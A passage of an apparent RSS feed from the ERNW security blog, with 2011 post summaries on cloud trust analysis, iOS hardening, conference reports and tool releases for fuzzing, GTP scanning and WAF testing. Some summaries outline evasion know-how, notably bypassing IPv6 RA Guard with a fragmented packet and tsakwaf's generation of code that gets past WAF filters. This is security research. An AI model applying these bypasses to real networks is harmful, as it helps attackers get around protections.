      <description>&lt;p&gt;A few days ago (on 10/12/2011) Apple launched its new cloud offering which is called — who would have guessed 😉 — iCloud. Since we’re performing quite some research in the area of cloud security, we had a first look at the basic functionality and concepts of the iCloud. Its main features include the possibility to store full backups of Apple devices (at least, an iPhone, iPad or iPod touch running iOS 5 or a Mac running OS X Lion 10.7.2 is required), photos, music, or documents online. The data to be stored online is initially pushed to the cloud storage and then synchronized to any device which is using the same iCloud account. From this moment on, all changes on the cloudified data is immediately synchronized to the iCloud and then pushed to all participating devices. At this point, most infosec people might start to be worried a little bit: The common cloud concept of centralized data storage on premise of a third party does not cope well with the usual control focused approach of most technical infosec guys. The resulting concerns can be attributed to several main cloud computing related risks (which are proposed by &lt;a href=&#34;http://www.enisa.europa.eu/&#34;&gt;ENISA&lt;/a&gt; and actually very valuable &lt;a href=&#34;http://www.enisa.europa.eu/act/rm/files/deliverables/cloud-computing-risk-assessment/at_download/fullReport&#34;&gt;work&lt;/a&gt;:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Packetwars, Sun &amp; Skills</title>
      <link>https://insinuator.net/2011/10/packetwars-sun-skills/</link>
      <pubDate>Sun, 16 Oct 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/10/packetwars-sun-skills/</guid>
      <description>&lt;p&gt;During the last days, some of our guys (including me) had some great days in Dayton. Rene, Christopher, Hendrik, Sergej, and me flew in to give workshops and presentations at &lt;a href=&#34;http://day-con.org/&#34; title=&#34;daycon&#34;&gt;Day-Con&lt;/a&gt; as well as to compete in the infamous &lt;a href=&#34;http://www.packetwars.com&#34;&gt;PacketWars&lt;/a&gt; game. While Day-Con is a one day event, the two days before the conference comprised workshops on &lt;a href=&#34;http://www.hmtrainingsolutions.com/en/home/85-ios-security-sichere-integration-von-iphone-a-ipad.html&#34;&gt;secure iOS integration&lt;/a&gt; (given by Rene) and &lt;a href=&#34;http://www.hmtrainingsolutions.com/en/home/91-ipv6technologie-und-integration.html&#34;&gt;IPv6 security&lt;/a&gt; (given by Christopher). Since the overall topic of the conference was trust, Rene gave a &lt;a href=&#34;http://www.ernw.de/publikationen/DayConV_ERNW_Broken_Trust_v025.pdf%20&#34;&gt;keynote&lt;/a&gt; on broken trust which was based exemplary trust analysis, development of a trust metric, and different trust factors. Those trust factors were also used in my talk about evaluation methodologies for &lt;a href=&#34;http://www.ernw.de/publikationen/do_they_deliver.pdf%20&#34;&gt;cloud service providers&lt;/a&gt; (regular followers will recognize some of the content of both talks from &lt;a href=&#34;http://www.insinuator.net/2011/10/broken-trust-part-2-applying-the-approach-to-dropbox/&#34;&gt;different&lt;/a&gt; &lt;a href=&#34;http://www.insinuator.net/2011/07/the-key-to-your-datacenter/&#34;&gt;posts&lt;/a&gt; 😉 ). There were also talks from Sergey Bratus, Graeme Neilson and Angus Blitter. While Sergey proposed a sound (not to say academic 😉 ) definition on the classification of vulnerabilities and their connection to &lt;a href=&#34;http://www.wolframalpha.com/input/?i=turing+completeness&#34;&gt;turing complete input languages&lt;/a&gt;, Angus gave an introduction to &lt;a href=&#34;http://grouper.ieee.org/groups/1901/&#34;&gt;PowerLine technologies&lt;/a&gt; and laid out, that these technologies still suffer from naive assumptions about trusted networks (he also refered to &lt;a href=&#34;http://www.blackhat.com/presentations/bh-europe-09/Rey_Mende/BlackHat-Europe-2009-Mende-Rey-All-Your-Packets-slides.pdf&#34;&gt;this&lt;/a&gt;). The day after the conference, the ERNW Allstars had to defend their championship title in PacketWars. Since the first battle was scheduled for 10AM, we had quite some time to tan in the sunny 30°C weather, recover from the conference and prepare the expected victory celebration (some of you might remember some “Champagne tradition” from &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt;). In face of this motivation, we rushed through the 3 battles and were able to score first place second year in a row. At this point, kudos to the two other participating teams who gave us a tough battle, especially during the reversing challenges.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Certificate Based Device Authentication with iOS Devices</title>
      <link>https://insinuator.net/2011/10/certificate-based-device-authentication-with-ios-devices/</link>
      <pubDate>Wed, 05 Oct 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/10/certificate-based-device-authentication-with-ios-devices/</guid>
      <description>&lt;p&gt;We recently performed a Proof-of-Concept (PoC) implementation of certificate based auth with iPads in some large environment. So far the focus has been mainly on WLAN access; VPN and EAS authentication are going to follow in the next step.&lt;/p&gt;&#xA;&lt;p&gt;As we figure that the topic might be of interest for some of you, we’ve extracted a certain, not-too-customer-specific part of the deliverable and converted it into an &lt;a href=&#34;http://www.ernw.de/content/e15/e26/e1662/download1664/ERNW_Newsletter_36_Cert_for_iOS_en_ger.pdf&#34;&gt;ERNW newsletter&lt;/a&gt;. Special thanks go to Rene Graf for leading the project! 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Broken Trust, Part 2: Applying the Approach to… Dropbox</title>
      <link>https://insinuator.net/2011/10/broken-trust-part-2-applying-the-approach-to-dropbox/</link>
      <pubDate>Mon, 03 Oct 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/10/broken-trust-part-2-applying-the-approach-to-dropbox/</guid>
      <description>&lt;p&gt;After having introduced the basic elements of our concept of trust, control and confidence in &lt;a href=&#34;http://www.insinuator.net/2011/06/broken-trust-part-1-definitions-fundamentals-some-more-reflections-on-rsa/&#34;&gt;this&lt;/a&gt; post, today I’ll try to strengthen your (and maybe even my own as well ;-)) understanding of these ideas by applying them to another candidate, that is Dropbox. Hence this post is mainly about performing a certain analysis method to some object; conclusions as for the question if Dropbox is suited to be used in enterprise environments processing sensitive data are out of scope and are left entirely to you, the valued reader.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Today I feel like Stansfield</title>
      <link>https://insinuator.net/2011/09/today-i-feel-like-stansfield/</link>
      <pubDate>Tue, 20 Sep 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/09/today-i-feel-like-stansfield/</guid>
      <description>&lt;p&gt;… the corrupt DEA agent in Luc Besson’s great movie “Léon (The Professional)”. I’m sure quite some of you, dear readers, know the plot…&lt;br&gt;&#xA;Just before the final shootout, when sending the first men of the NYPD ESU team into Léon’s apartment, he tells them to “Be careful!”. After learning those men got killed he just comments: “I told you”.&lt;br&gt;&#xA;[btw: before yelling to bring “EEEEEEEVERYONE!!!!”, as those familiar with the piece will certainly remember ;-)].&lt;/p&gt;</description>
    </item>
    <item>
      <title>Appstore security: 5 lines of defence against malware</title>
      <link>https://insinuator.net/2011/09/appstore-security-5-lines-of-defence-against-malware/</link>
      <pubDate>Sat, 17 Sep 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/09/appstore-security-5-lines-of-defence-against-malware/</guid>
      <description>&lt;p&gt;A few days ago the European Network and Information Security Agency (ENISA) published &lt;a href=&#34;http://www.enisa.europa.eu/act/application-security/smartphone-security-1/appstore-security-5-lines-of-defence-against-malware/at_download/fullReport%20&#34;&gt;this quite interesting document&lt;/a&gt; with the exact title. Here’s what it covers:&lt;/p&gt;&#xA;&lt;p&gt;“The booming smartphone industry has a special way of delivering software to end-users: appstores. Popular appstores have hundreds of thousands of apps for anything from online banking to mosquito repellent, and the most popular stores (Apple Appstore, Google Android market) claim billions of app downloads. But appstores have not escaped the attention of cyber attackers. Over the course of 2011 numerous malicious apps were found, across a variety of smartphone models. Using malicious apps, attackers can easily tap into the vast amount of private data processed on smartphones such as confidential business emails, location data, phone calls, SMS messages and so on. Starting from a threat model for appstores, this paper identifies five lines of defence that must be in place to address malware in appstores: app review, reputation, kill-switches, device security and jails.”&lt;/p&gt;</description>
    </item>
    <item>
      <title>tsakwaf 0.9.1 released</title>
      <link>https://insinuator.net/2011/09/tsakwaf-0.9.1-released/</link>
      <pubDate>Sun, 11 Sep 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/09/tsakwaf-0.9.1-released/</guid>
      <description>&lt;p&gt;A few weeks ago, I released version 0.9 of a web application testing tool called tsakwaf (The Swiss Army Knife for Web Application Firewalls) together with an ERNW &lt;a href=&#34;http://www.ernw.de/content/e15/e28/index_ger.html&#34; title=&#34;Newsletter&#34;&gt;Newsletter&lt;/a&gt; about &lt;a href=&#34;http://www.insinuator.net/2011/06/the-5-myths-of-web-application-firewalls/&#34; title=&#34;web application firewalls&#34;&gt;web application firewalls&lt;/a&gt;. tsakwaf is based on perl and supports fingerprinting of some supported WAFs and code generation methods to circumvent filter rules. Today, version 0.9.1 will be released, which adds SSL support for the WAF fingerprinting function (Big thanks to Simon Rich!) and a bug fix regarding the detection of WAF reactions which may lead to false positives. Additionally, I’m happy to announce that at least one talk at next year’s &lt;a href=&#34;http://www.troopers.de&#34; title=&#34;Troopers&#34;&gt;Troopers&lt;/a&gt; will cover attacks against WAFs (like this one from the 2009 &lt;a href=&#34;http://troopers09.org/content/e644/e649/TROOPERS09_gauci_henrique_web_application_firewalls.pdf&#34; title=&#34;edition&#34;&gt;edition&lt;/a&gt;) . So mark your calendar – Troopers12 will happen on 21^(st) and 22^(nd) March 2012, with the usual workshops before the conference and the round table sessions the day after – and enjoy playing with tsakwaf!&lt;/p&gt;</description>
    </item>
    <item>
      <title>(Auditing) Remote Access Security in 2011</title>
      <link>https://insinuator.net/2011/08/auditing-remote-access-security-in-2011/</link>
      <pubDate>Sun, 14 Aug 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/08/auditing-remote-access-security-in-2011/</guid>
      <description>&lt;p&gt;I’m currently involved in a “Remote Access Security Assessment” and you might be wondering what exactly this means. Well, so did we. At least to some degree (btw: last year we provided some notes on types of security assessments &lt;a href=&#34;http://www.insinuator.net/2010/05/security-assessments/&#34;&gt;here&lt;/a&gt;).&lt;/p&gt;&#xA;&lt;p&gt;It happens quite often we’re brought into an organization to perform “a security assessment” of “some item” (“our network”, “that new procurement portal”, “the PKI” etc.). It happens as well the customer does not have a very clear idea of the way such an assessment should be carried out (telling us “you are the experts, you should know what to do”). Or the five people from the customer’s side present in the kick-off meeting have five different concepts (ok, four. as one of them only wants “to get that damned assessment done so we can finally go live”) and we end up moderating their arguments on what should be tested, how this should be done, when this is going to happen, which type of report format is needed (obviously, there’s different ones, depending on the goal/scope/methodology of the assessment…) etc.&lt;/p&gt;</description>
    </item>
    <item>
      <title>OS X Security in Corporate Networks</title>
      <link>https://insinuator.net/2011/08/os-x-security-in-corporate-networks/</link>
      <pubDate>Sat, 06 Aug 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/08/os-x-security-in-corporate-networks/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://www.isecpartners.com/storage/docs/presentations/iSEC_BH2011_Mac_APT.pdf&#34;&gt;Interesting presentation&lt;/a&gt; just given at Black Hat Vegas.&lt;/p&gt;&#xA;&lt;p&gt;May be worth a read for those of you responsible for security in networks with MAC users.&lt;/p&gt;&#xA;&lt;p&gt;have a great weekend,&lt;/p&gt;&#xA;&lt;p&gt;Enno&lt;/p&gt;</description>
    </item>
    <item>
      <title>Smart (and Scary) Supply Chain Attack</title>
      <link>https://insinuator.net/2011/08/smart-and-scary-supply-chain-attack/</link>
      <pubDate>Thu, 04 Aug 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/08/smart-and-scary-supply-chain-attack/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;http://www.cisco.com/en/US/products/csr/cisco-sr-20110803-cd.html&#34;&gt;This advisory&lt;/a&gt; describes an interesting attack vector:&lt;/p&gt;&#xA;&lt;p&gt;“In the period of December 2010 until August 2011, Cisco shipped warranty CDs that contain a reference to a third-party website known to be a malware repository. When the CD is opened with a web browser, it automatically and without warning accesses this third-party website. Additionally, on computers where the operating system is configured to automatically open inserted media, the computer’s default web browser will access the third-party site when the CD is inserted, without requiring any further action by the user.”&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Key to your Datacenter</title>
      <link>https://insinuator.net/2011/07/the-key-to-your-datacenter/</link>
      <pubDate>Tue, 19 Jul 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/07/the-key-to-your-datacenter/</guid>
      <description>&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;During our ongoing research on the security of cloud service providers and cloud based applications, we performed a regular audit of our &lt;a href=&#34;http://aws.amazon.com&#34; title=&#34;AWS&#34;&gt;AWS&lt;/a&gt; account password. Thinking of &lt;a href=&#34;http://www.wired.com/threatlevel/2009/07/kaminsky-hacked/&#34;&gt;popular incidents&lt;/a&gt; and evergreens in &lt;a href=&#34;%20http://88.84.128.30/~isnochys/wordpress/wp-content/bruteforce.jpg&#34;&gt;attack vectors&lt;/a&gt;, we were wondering which consequences an online bruteforce attack on our AWS password would have. So we decided to perform a bruteforce attack against our own account. Analyzing the login process of AWS, the following requirements for the bruteforce tool to be used could be derived:&lt;/p&gt;</description>
    </item>
    <item>
      <title>iOS Hardening Configuration Guide</title>
      <link>https://insinuator.net/2011/07/ios-hardening-configuration-guide/</link>
      <pubDate>Sun, 17 Jul 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/07/ios-hardening-configuration-guide/</guid>
      <description>&lt;p&gt;Hi everybody,&lt;br&gt;&#xA;eye-catching title of this post, huh?&lt;/p&gt;&#xA;&lt;p&gt;Actually there is some justification for it ;-), that is bringing &lt;a href=&#34;http://www.dsd.gov.au/publications/iOS_Hardening_Guide.pdf&#34;&gt;this excellent document covering the exact topic&lt;/a&gt; to your attention.&lt;br&gt;&#xA;Other than that this post contains some unordered reflections which arose in a recent meeting in a quite large organization on the “common current iPad topic” (executives would like to have/use an iPad, infosec doesn’t like the idea, business – as we all know – wins, so bring external expertise in “to help us find a way of doing this securely” yadda yadda yadda).&lt;br&gt;&#xA;Which – given those nifty little boxes are _consumer_ devices which were probably never meant to process sensitive corporate data – might be a next-to-impossible task… at least in a way that satisfies business expectations as for “usability”…[btw: can anybody confirm my observation that there’s a correlation between “rigor of restriction approach” to “number of corporate emails forwarded to private webmail accounts”?]&lt;/p&gt;</description>
    </item>
    <item>
      <title>Week of releases – apnbf</title>
      <link>https://insinuator.net/2011/07/week-of-releases-apnbf/</link>
      <pubDate>Thu, 14 Jul 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/07/week-of-releases-apnbf/</guid>
      <description>&lt;p&gt;Another day, another tool 😉&lt;/p&gt;&#xA;&lt;p&gt;Today I’m proudly releasing the first version of apnbf, a small python script designed for enumerating valid APNs (Access Point Name) on a GTP-C speaking device. It tries to establish a new PDP session with the endpoint via sending a createPDPContextRequest. This request needs to include a valid APN, so one can easily distinguish from a valid APN (which will be answered with a createPDPContextResponse) and an invalid APN (which will be answered with an error indication message). In addition the tool also parses the error indication and displays the reason (which should be “Missing or unknown APN” in case of an invalid APN).&lt;/p&gt;</description>
    </item>
    <item>
      <title>Week of releases – gtp_scan-0.7</title>
      <link>https://insinuator.net/2011/07/week-of-releases-gtp_scan-0.7/</link>
      <pubDate>Wed, 13 Jul 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/07/week-of-releases-gtp_scan-0.7/</guid>
      <description>&lt;p&gt;So, after having a completely new release yesterday, we will stay with already known but updated software today. You might have heard of gtp_scan before, which is a small python script for scanning mainly 3G and 4G devices and detecting GTP (GPRS Tunneling Protocol) enabled ports. As GTP is transported via UDP and we all know, UDP scanning is a pain, the tool uses the GTP build-in echo mechanism to detect GTP speaking ports. Since the last version I’ve implemented some new features:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Week of releases – dizzy</title>
      <link>https://insinuator.net/2011/07/week-of-releases-dizzy/</link>
      <pubDate>Tue, 12 Jul 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/07/week-of-releases-dizzy/</guid>
      <description>&lt;p&gt;I’m proud to announce, today a new fuzzing framework will see the light of day. It’s called &lt;em&gt;dizzy&lt;/em&gt; and was written because the tools we used for fuzzing in past didn’t match our requirements. Some (unique) features are:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Python based&lt;/li&gt;&#xA;&lt;li&gt;Fast!&lt;/li&gt;&#xA;&lt;li&gt;Can send to L2 as well as to upper layers (TCP/UDP/SCTP)&lt;/li&gt;&#xA;&lt;li&gt;Ability to work with odd length packet fields (no need to match byte borders, so even single flags or 7bit long fields can be represented and fuzzed)&lt;/li&gt;&#xA;&lt;li&gt;Very easy protocol definition syntax&lt;/li&gt;&#xA;&lt;li&gt;Ability to do multi packet state-full fuzzing with the ability to use received target data in response.&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;We already had a lot of success using it, now you will be able to know the true promises.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Week of releases – loki-0.2.7</title>
      <link>https://insinuator.net/2011/07/week-of-releases-loki-0.2.7/</link>
      <pubDate>Mon, 11 Jul 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/07/week-of-releases-loki-0.2.7/</guid>
      <description>&lt;p&gt;Today I’m going to open up the ‘Week of releases’, which means there will be some new software in the next days.&lt;/p&gt;&#xA;&lt;p&gt;Lets start with a new version of &lt;em&gt;loki&lt;/em&gt;. The version goes up to 0.2.7 and there are a lot of new features:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;SCTP support in the base.&lt;/li&gt;&#xA;&lt;li&gt;Invalid option and invalid header scan in the ICMP6 module.&lt;/li&gt;&#xA;&lt;li&gt;On-line msg updates for neighbor messages in the RIP module.&lt;/li&gt;&#xA;&lt;li&gt;New module for rewriting 802.1Q labels&lt;/li&gt;&#xA;&lt;li&gt;Lots of small improvements and bug-fixes&lt;/li&gt;&#xA;&lt;li&gt;Some new features I won’t tell right now, get the source and find them yourself 😉&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;Also there are new packages for gentoo, ubuntu-11.04 and fedora-15, also its the first time, packages for amd64 systems are available.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The 5 Myths of Web Application Firewalls</title>
      <link>https://insinuator.net/2011/06/the-5-myths-of-web-application-firewalls/</link>
      <pubDate>Mon, 27 Jun 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/06/the-5-myths-of-web-application-firewalls/</guid>
      <description>&lt;p&gt;Some days ago a security advisory related to web application firewalls (WAFs) was published on Full Disclosure. Wendel Guglielmetti Henrique found another bug in the IBM Web Application Firewall which can be used to circumvent the WAF and execute typical web application attacks like SQL injection (click here for details). Wendel talked already (look &lt;a href=&#34;http://troopers09.org/content/e644/e649/TROOPERS09_gauci_henrique_web_application_firewalls.pdf%20&#34;&gt;here&lt;/a&gt;) at the &lt;a href=&#34;http://www.troopers.de&#34;&gt;Troopers&lt;/a&gt; Conference in 2009 about the different techniques to identify and bypass WAFs, so this kind of bypass methods are not quite new.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Broken Trust, Part 1: Definitions &amp; Fundamentals &#43; Some More Reflections on RSA</title>
      <link>https://insinuator.net/2011/06/broken-trust-part-1-definitions-fundamentals--some-more-reflections-on-rsa/</link>
      <pubDate>Sun, 19 Jun 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/06/broken-trust-part-1-definitions-fundamentals--some-more-reflections-on-rsa/</guid>
      <description>&lt;p&gt;This again is going to be a little series of posts. Their main topic – next to the usual deviations &amp;amp; ranting I tend to include in blogposts 😉 – is some discussion of “trust” and putting this discussion into the context of recent events and future developments in the infosec space. The title originates from a conversation between Angus Blitter and me in a nice Thai restaurant in Zurich where we figured the consequences of the &lt;a href=&#34;http://arstechnica.com/security/news/2011/06/rsa-finally-comes-clean-securid-is-compromised.ars%20&#34;&gt;latest RSA revelations&lt;/a&gt;. While we both expect that – unfortunately – not much is really going to happen (surprisingly many people, including some CSOs we know, are still trying to somehow downplay this or sweep it under the carpet, shying away from the – obvious – consequences it might have to accept that for a number of environments RSA SecurID is potentially reduced to single factor auth nowadays…), the long term impact on our understanding of 3rd party (e.g. vendor) trust might be more interesting. Furthermore “Broken Trust” seems a promising title for a talk at upcoming &lt;a href=&#34;http://www.day-con.org&#34;&gt;Day-Con V&lt;/a&gt;… 😉&lt;/p&gt;</description>
    </item>
    <item>
      <title>Extracting Data from Very Large Pcap Files – Part 3: Pcap Filtering in the Cloud</title>
      <link>https://insinuator.net/2011/06/extracting-data-from-very-large-pcap-files-part-3-pcap-filtering-in-the-cloud/</link>
      <pubDate>Mon, 13 Jun 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/06/extracting-data-from-very-large-pcap-files-part-3-pcap-filtering-in-the-cloud/</guid>
      <description>&lt;p&gt;This is the third (and last) part of the series (parts &lt;a href=&#34;http://www.insinuator.net/2011/04/extracting-data-from-very-large-pcap-files-part-1-tools-and-hardware/%20&#34;&gt;1&lt;/a&gt; &amp;amp; &lt;a href=&#34;http://www.insinuator.net/2011/06/extracting-data-from-very-large-pcap-files-%E2%80%93-part-2-results-from-the-local-lab/%20&#34;&gt;2&lt;/a&gt; here). We’ll provide the results from some additional tests supported by public cloud services, namely AWS (Amazon Web Services).&lt;/p&gt;&#xA;&lt;p&gt; &lt;br&gt;&#xA;&lt;strong&gt;Lab Setup&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;The Amazon Elastic Compute Cloud (short: EC2) provides a flexible environment for the on demand provisioning of virtual machines of different performance levels. For our lab setup, a so-called extra large instance was used. According to Amazon, the technical specs are the following:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Extracting Data from Very Large Pcap Files – Part 2: Results from the Local Lab</title>
      <link>https://insinuator.net/2011/06/extracting-data-from-very-large-pcap-files-part-2-results-from-the-local-lab/</link>
      <pubDate>Thu, 02 Jun 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/06/extracting-data-from-very-large-pcap-files-part-2-results-from-the-local-lab/</guid>
      <description>&lt;p&gt;In the &lt;a href=&#34;http://www.insinuator.net/2011/04/extracting-data-from-very-large-pcap-files-part-1-tools-and-hardware/&#34;&gt;first post&lt;/a&gt; I’ve laid out the tools and lab setup, so in this one I’m going to discuss some results.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Description of overall test methodology&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;To evaluate the performance of the different setups used to analyze capture data, both tcpdump and pcap_extractor (see last post) were used. For the tests, five capture files were created using mergecap. Various sample traffic dumps were merged to five large files with different file sizes. All these files consisted of several capture files containing a variety of protocols (including iSCSI and FCoE packets). Capture files of ∼40, ∼80, ∼200, ∼500, and ∼800 GB size were created and were analyzed with both tools. For all tests the filtering expressions for tcpdump and pcap_extractor were configured to search for a specific source IP and a specific destination IP matching to iSCSI packets contained in the capture file. Additionally pcap_extractor was “instructed” to look for some search string (formatted like a credit card number).To address the performance bottleneck (again, see last post), that is the I/O throughput, two different setups of the testing environment (see above) were implemented, the first one going with a raid0 approach using four SSD hard drives, the second one with four individual SSD hard drives, each of them processing only a fourth of the analyzed capture file. Standard UNIX time command was invoked to measure the time of execution. Additionally the tools analyzing the data were started with the highest possible scheduling priority to ensure execution with the maximum of available resources. This is a sample command line invoking the test:&lt;/p&gt;</description>
    </item>
    <item>
      <title>HITB Aftermath</title>
      <link>https://insinuator.net/2011/05/hitb-aftermath/</link>
      <pubDate>Sat, 28 May 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/05/hitb-aftermath/</guid>
      <description>&lt;p&gt;Hi,&lt;br&gt;&#xA;didn’t find the time so far to post a short blog about &lt;a href=&#34;http://conference.hackinthebox.org/hitbsecconf2011ams/&#34;&gt;HITB Amsterdam&lt;/a&gt; so far… but here we go.&lt;/p&gt;&#xA;&lt;p&gt;Unfortunately I couldn’t arrive in AMS earlier than Thursday evening so I missed the first day (and – from what I heard – some great talks). However we went out for dinner that night with the likes of Andreas (Wiegenstein), Jim (Geovedi), Raoul (Chiesa), Travis (Goodspeed), Claudio (Criscione) and some more guys and I had some quite good conversations, both on technical matters and on Intra-European cultural differences ;-). Btw: thanks again to Martijn for taking care of the restaurant.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt</title>
      <link>https://insinuator.net/2011/05/yet-another-update-on-ipv6-security-some-notes-from-the-ipv6-kongress-in-frankfurt/</link>
      <pubDate>Mon, 16 May 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/05/yet-another-update-on-ipv6-security-some-notes-from-the-ipv6-kongress-in-frankfurt/</guid>
      <description>&lt;p&gt;A couple of hours ago Christopher (Werny) and I gave &lt;a href=&#34;http://ernw.de/content/e7/e181/e1641/download1643/ERNW_IPv6_Security_in_LANs_ger.pdf&#34;&gt;this presentation&lt;/a&gt; at the Heise IPv6-Kongress, which overall was a quite interesting and well-organized event bringing together a number of practitioners from the field. While yesterday’s talks were dominated by a certain euphoria and optimistic pioneer spirit, the second day featured some security talks which induced slight shadows to the brave new world of IPv6 ;-). I particularly enjoyed meeting Eric Vyncke from Cisco (one of the two authors of &lt;a href=&#34;http://www.amazon.com/IPv6-Security-Scott-Hogg/dp/1587055945&#34;&gt;this great book&lt;/a&gt;) and Marc “van Hauser” Heuse who released a new version of the &lt;a href=&#34;http://www.thc.org/thc-ipv6/&#34;&gt;THC-IPV6 tool set&lt;/a&gt; today. We had some fruitful discussions and we took the opportunity to test some of his newly implemented attacks against “RA Guard” running on a 4948E Chris and I had brought for a demo within our talk. Unfortunately – or fortunately in terms of a &lt;a href=&#34;http://www.troopers.de/wp-content/uploads/2011/04/TR11_Enno_Rey_Keynote_Day01.pdf%20&#34;&gt;“from theory to reality”&lt;/a&gt; approach – I have to say that Marc found a quite clever way to circumvent RA Guard by putting the actual “RA payload” into a second frame following a first one mostly containing a “long &amp;amp; empty” destination option (after a fragmentation header pointing to the mentioned second one). To get an idea pls see these screenshots from Wireshark. &lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2011/05/thc_wireshark_over.png&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2011/05/thc_wireshark_over.png&#34; alt=&#34;&#34; title=&#34;thc_wireshark_over&#34;&gt;&lt;/a&gt; &lt;a href=&#34;http://www.insinuator.net/wp-content/uploads/2011/05/thc_wireshark_details1.png&#34;&gt;&lt;img src=&#34;http://www.insinuator.net/wp-content/uploads/2011/05/thc_wireshark_details1.png&#34; alt=&#34;&#34; title=&#34;thc_wireshark_details&#34;&gt;&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Evaluating Operational Feasibility</title>
      <link>https://insinuator.net/2011/05/evaluating-operational-feasibility/</link>
      <pubDate>Mon, 02 May 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/05/evaluating-operational-feasibility/</guid>
      <description>&lt;p&gt;Hi,&lt;br&gt;&#xA;I’ve discussed the concept of evaluating the operational “feasibility” (or “impact”, depending on your point of view) of security controls &lt;a href=&#34;http://www.insinuator.net/2010/12/security-benefit-operational-impact-or-the-illusion-of-infinite-resources/%20&#34;&gt;before&lt;/a&gt;. Some people approached me asking “which considerations should we take into account when trying to understand or rate this for $SOME_SECURITY_CONTROL?”. Therefore, in the following I’ll give an unordered list of factors to consider to get an understanding of the “operational feasibility” of a given security control. Two things should be noted in advance:&lt;/p&gt;</description>
    </item>
    <item>
      <title>update for your fuzzing toolkit</title>
      <link>https://insinuator.net/2011/05/update-for-your-fuzzing-toolkit/</link>
      <pubDate>Mon, 02 May 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/05/update-for-your-fuzzing-toolkit/</guid>
      <description>&lt;p&gt;As I’m currently developing the ‘next gen’ state-full fuzzing framework @ERNW [called dizzy, to be released soon 😉 ], I will give you an updated set of fuzzing scripts from the ‘old world’.&lt;/p&gt;&#xA;&lt;p&gt;Some of you will remember the 2008 release of sulley_l2, which was a modified version of the sulley fuzzing framework, enhanced with Layer 2 sending capabilities and a hole bunch of (L2) fuzzing scripts. All the blinking, rebooting, mem-corrupting ciscos gave us some attention. Back from then, we continued to write and use the fuzzing scripts, so the hole collection grew.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Extracting Data from Very Large Pcap Files – Part 1: Tools and Hardware</title>
      <link>https://insinuator.net/2011/04/extracting-data-from-very-large-pcap-files-part-1-tools-and-hardware/</link>
      <pubDate>Thu, 28 Apr 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/04/extracting-data-from-very-large-pcap-files-part-1-tools-and-hardware/</guid>
      <description>&lt;p&gt;There is a common misconception that the sheer amount of data coupled with multiplexed channels (e.g. WDM technology) make successful eavesdropping attacks on high speed Ethernet links – like those connecting data centers – highly unlikely. This is mainly based on the assumption that the amount of resources (e.g. RAM, [sufficiently fast] storage or CPU power) needed to process large files of captured data is a limiting factor. However, to the best of our knowledge, no practical evaluation of these assumptions has so far been performed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Once more: hardening is better than patching</title>
      <link>https://insinuator.net/2011/04/once-more-hardening-is-better-than-patching/</link>
      <pubDate>Wed, 13 Apr 2011 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2011/04/once-more-hardening-is-better-than-patching/</guid>
